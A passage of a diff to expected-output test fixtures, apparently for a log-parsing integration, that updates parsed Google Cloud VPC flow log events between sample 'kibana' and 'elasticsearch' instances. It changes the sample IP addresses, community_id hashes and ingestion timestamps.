"{\"insertId\":\"y4wffpfk2eroq\",\"jsonPayload\":{\"bytes_sent\":\"175633\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33576,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"67\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -10888,10 +10888,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33540, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -10905,7 +10905,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MQOhdELEvqJXellZlJ8csNiAoAM=", + "community_id": "1:F/7D/X852gHR0MKQ6f237loatS0=", "bytes": 116981, "name": "default", "transport": "tcp", @@ -10928,7 +10928,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -10964,8 +10964,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868824900Z",
- "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}",
+ "ingested": "2021-12-09T13:37:46.391748700Z",
+ "original": "{\"insertId\":\"y4wffpfk2ero5\",\"jsonPayload\":{\"bytes_sent\":\"116981\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33540,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"234\",\"reporter\":\"SRC\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:01.074813982Z",
 "end": "2019-06-14T03:49:51.789112562Z",
@@ -10992,18 +10992,18 @@
 "as": {
 "number": 15169
 },
- "address": "203.0.113.134",
+ "address": "67.43.156.13",
 "port": 33690,
 "bytes": 67789,
 "domain": "kibana",
- "ip": "203.0.113.134",
+ "ip": "67.43.156.13",
 "packets": 344
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:WEAf6ne8e1XsbHxRodKfYT1TGbg=",
+ "community_id": "1:R07THsJrApr+LxzJU52QZR3EPhM=",
 "bytes": 67789,
 "name": "default",
 "transport": "tcp",
@@ -11025,7 +11025,7 @@
 },
 "related": {
 "ip": [
- "203.0.113.134",
+ "67.43.156.13",
 "10.139.99.242"
 ]
 },
@@ -11062,8 +11062,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868828100Z",
- "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}",
+ "ingested": "2021-12-09T13:37:46.391754200Z",
+ "original": "{\"insertId\":\"y4wffpfk2eroo\",\"jsonPayload\":{\"bytes_sent\":\"67789\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:48.542406314Z\",\"packets_sent\":\"344\",\"reporter\":\"DEST\",\"rtt_msec\":\"196\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075867049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:06.075867049Z",
 "end": "2019-06-14T03:49:48.542406314Z",
@@ -11084,10 +11084,10 @@
 "as": {
 "number": 15169
 },
- "address": "203.0.113.134",
+ "address": "67.43.156.13",
 "port": 33538,
 "domain": "kibana",
- "ip": "203.0.113.134"
+ "ip": "67.43.156.13"
 },
 "source": {
 "address": "10.139.99.242",
@@ -11101,7 +11101,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:NoAWHdeVVE/1VjCAle3M10HSrH0=",
+ "community_id": "1:ZH1or4RA5RqLjC/iRPmayKRTLeA=",
 "bytes": 136166,
 "name": "default",
 "transport": "tcp",
@@ -11124,7 +11124,7 @@
 "related": {
 "ip": [
 "10.139.99.242",
- "203.0.113.134"
+ "67.43.156.13"
 ]
 },
 "gcp": {
@@ -11160,8 +11160,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868831100Z",
- "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391759800Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhg9\",\"jsonPayload\":{\"bytes_sent\":\"136166\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33538,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"245\",\"reporter\":\"SRC\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:01.074952616Z",
 "end": "2019-06-14T03:49:59.565124617Z",
@@ -11190,17 +11190,17 @@
 "as": {
 "number": 33652
 },
- "address": "203.0.113.58",
+ "address": "67.43.156.13",
 "port": 65257,
 "bytes": 68262,
- "ip": "203.0.113.58",
+ "ip": "67.43.156.13",
 "packets": 718
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:DqikX2/VHNCo3K4Z/FQLlk5o8C4=",
+ "community_id": "1:IOiOyU4WA7IZikjr7eAoksKW7Mw=",
 "bytes": 68262,
 "transport": "tcp",
 "type": "ipv4",
@@ -11214,7 +11214,7 @@
 },
 "related": {
 "ip": [
- "203.0.113.58",
+ "67.43.156.13",
 "10.139.99.242"
 ]
 },
@@ -11239,8 +11239,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868834Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391765300Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgh\",\"jsonPayload\":{\"bytes_sent\":\"68262\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65257},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"718\",\"reporter\":\"DEST\",\"rtt_msec\":\"220\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:59.403388091Z",
 "end": "2019-06-14T03:49:56.220614265Z",
@@ -11267,17 +11267,17 @@
 "as": {
 "number": 15169
 },
- "address": "198.51.100.107",
+ "address": "67.43.156.14",
 "port": 52328,
 "bytes": 1457,
- "ip": "198.51.100.107",
+ "ip": "67.43.156.14",
 "packets": 7
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:EE4Jx/GklVta9XikBj43wQU3qJM=",
+ "community_id": "1:zciDpB3TX5D1bnYbRXdjbgQDN+Q=",
 "bytes": 1457,
 "transport": "tcp",
 "type": "ipv4",
@@ -11291,7 +11291,7 @@
 },
 "related": {
 "ip": [
- "198.51.100.107",
+ "67.43.156.14",
 "10.87.40.76"
 ]
 },
@@ -11316,8 +11316,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868837Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391770800Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgj\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52328},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:20.952481728Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:20.842840991Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:42:20.842840991Z",
 "end": "2019-06-14T03:42:20.952481728Z",
@@ -11344,17 +11344,17 @@
 "as": {
 "number": 15169
 },
- "address": "198.51.100.107",
+ "address": "67.43.156.14",
 "port": 59790,
 "bytes": 1460,
- "ip": "198.51.100.107",
+ "ip": "67.43.156.14",
 "packets": 7
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:2VaSImZuAKUa2JwnaG4ATyMe4g0=",
+ "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=",
 "bytes": 1460,
 "transport": "tcp",
 "type": "ipv4",
@@ -11368,7 +11368,7 @@
 },
 "related": {
 "ip": [
- "198.51.100.107",
+ "67.43.156.14",
 "10.87.40.76"
 ]
 },
@@ -11393,8 +11393,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868840Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391776400Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgr\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":59790},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:40:50.590894439Z",
 "end": "2019-06-14T03:40:50.702194466Z",
@@ -11423,17 +11423,17 @@
 "as": {
 "number": 33652
 },
- "address": "203.0.113.58",
+ "address": "67.43.156.13",
 "port": 65317,
 "bytes": 73681,
- "ip": "203.0.113.58",
+ "ip": "67.43.156.13",
 "packets": 728
 },
 "tags": [
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:KUhb7O2JuCr67sFOvEo0t6q1bx0=",
+ "community_id": "1:Z1gkzsFxPRA+wdZ4AaO0v0oQz34=",
 "bytes": 73681,
 "transport": "tcp",
 "type": "ipv4",
@@ -11447,7 +11447,7 @@
 },
 "related": {
 "ip": [
- "203.0.113.58",
+ "67.43.156.13",
 "10.139.99.242"
 ]
 },
@@ -11472,8 +11472,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868843100Z",
- "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391781900Z",
+ "original": "{\"insertId\":\"ptjoddfhmrhgn\",\"jsonPayload\":{\"bytes_sent\":\"73681\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65317},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"728\",\"reporter\":\"DEST\",\"rtt_msec\":\"62\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
 "kind": "event",
 "start": "2019-06-14T03:39:59.740491697Z",
 "end": "2019-06-14T03:49:56.220599950Z",
@@ -11496,9 +11496,9 @@
 "as": {
 "number": 33652
 },
- "address": "203.0.113.58",
+ "address": "67.43.156.13",
 "port": 65317,
- "ip": "203.0.113.58"
+ "ip": "67.43.156.13"
 },
 "source": {
 "address": "10.139.99.242",
@@ -11512,7 +11512,7 @@
 "preserve_original_event"
 ],
 "network": {
- "community_id": "1:KUhb7O2JuCr67sFOvEo0t6q1bx0=",
+ "community_id": "1:Z1gkzsFxPRA+wdZ4AaO0v0oQz34=",
 "bytes": 92566,
 "transport": "tcp",
 "type": "ipv4",
@@ -11527,7 +11527,7 @@
 "related": {
 "ip": [
 "10.139.99.242",
- "203.0.113.58"
+ "67.43.156.13"
 ]
 },
 "gcp": {
@@ -11551,8 +11551,8 @@
 }
 },
 "event": {
- "ingested": "2021-06-09T10:48:29.868846100Z",
- "original": "{\"insertId\":\"ptjoddfhmrhga\",\"jsonPayload\":{\"bytes_sent\":\"92566\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65317,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220599950Z\",\"packets_sent\":\"596\",\"reporter\":\"SRC\",\"rtt_msec\":\"62\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.740491697Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}",
+ "ingested": "2021-12-09T13:37:46.391787400Z",
